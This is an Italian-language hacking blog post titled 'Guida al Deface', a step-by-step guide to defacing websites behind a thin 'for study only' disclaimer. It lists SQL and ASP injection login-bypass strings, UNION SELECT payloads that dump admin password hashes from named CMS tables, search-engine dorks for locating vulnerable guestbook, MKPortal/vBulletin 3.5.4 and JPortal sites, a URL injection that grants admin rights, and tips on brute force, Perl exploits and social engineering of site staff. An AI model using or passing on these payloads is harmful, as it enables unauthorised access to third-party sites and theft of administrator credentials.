DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Guida al Deface


Allora, in questa guida metterò tutti i modi per defacciare i siti.
Andrò in ordine crescente di difficoltà. Bene! Partiamo dalla prima tecnica!

SOCIAL ENGINEERING
Allora qua sta tutto sulla vostra astuzia infatti il social non è altro che diventare parte dello staff del sito o forum. ESEMPIO:
Utente: Ciao, posso diventare dello staff?
Admin: Posta molto e vediamo.
Utente: OK
Admin: Bene sei dello staff!
Da li poi fate quello che vi pare.

SQL INJECTION
Questa tecnica sfrutta le apllicazione del web SQL. Quando avete trovato il sito, ovviamente deve essere vulnerabile nel login mettete:

CODICE
Username: ‘or’’=’
Password: ‘or’’=’

E dovrete essere dentro come admin.
Altro metodo nella stringa della ricerca mettete:
CODICE
p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

Ci compariranno le pwd degli admin in MD5. Poi decriptatele.

ASP INJECTION
Molto simile al SQL INFECTION. Una volta trovato il sito in .asp nel login mettiamo questo:
Utente senza registrazione
- UserName:’ ----------> apostrofo snz spazio…
- Password: ----------> nessuna password, lasciate vuoto…

Scoprire la password dell’amministratore
UserName: ' union select Password,1,1,1 from members where UserID = 'admin'-
Password: ----------> nessuna password…

Diventare automaticamente amministratori…
UserName: admin' -
Password ---------> nessuna pass

Diventare il primo utente nella lista degli utenti!!!
UserName: ' or 0=0 --sp_password
Password: --------> nessuna pass anche stavolta!

GUESTBOOK
Il GUESTBOOK permette di lasciare commenti da parte di un visitatore. Bene in un motore di ricerca scriviamo:

CODICE
inurl:”guestbook/admin/login.php

Una volta trovato il sito nel campo username mettiamo:
CODICE
'or 'jr7'='jr7' /*

Nel campo della pwd mettete a piacere.
Ora siamo padroni del forum/sito.

MKPortal + vBulletin 3.5.4
Su un motore di ricerca cercate

CODICE
Powered by mkportal vbulletin 3.5.4

Trovato il sito vulnerabile aggiungiamo all'URL
CODICE
ind=',userid='1

Dovrete essere padroni del sito.

JPORTAL
Su un motore di ricerca cercate:

CODICE
Powered by jportal

Verrano fuori un tot di pagine. Clicchiamo su un sito e dove c'è http://www.ecc... aggiungiamo:
CODICE
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Dov'è vedete la X mettete o 1 o 2. Se va bene ci saranno le pwd degli admin.

BRUTE FORCE
Scaricate un programma che abbia a che fare col brute force ovviamente ne trovate parecchi su google.it mettete il link del sito vittima e aspettate che il programma crakka la pwd. Funziona pochissime volte.

EXPLOIT
Se volete un exploit in pearl scaricate Active Pearl per tradurlo si trova benissimamente su google.it. Fatto scegliete un exploit e salvatelo in blocco note con quellochevuoi.pl Mettetelo in: C:\Perl\bin. Apriamo il prompt e portiamoci l'exploit comparirà come usarlo ecc...

1 commento: